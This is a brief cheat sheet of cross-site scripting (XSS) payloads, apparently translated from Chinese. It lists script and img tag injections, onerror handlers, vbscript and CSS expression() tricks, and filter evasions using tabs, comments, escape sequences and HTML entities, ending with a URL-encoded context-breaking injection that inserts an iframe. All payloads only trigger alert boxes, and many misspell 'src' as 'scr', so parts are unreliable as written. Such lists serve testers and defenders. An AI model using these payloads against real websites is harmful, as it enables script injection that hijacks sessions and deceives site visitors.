<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["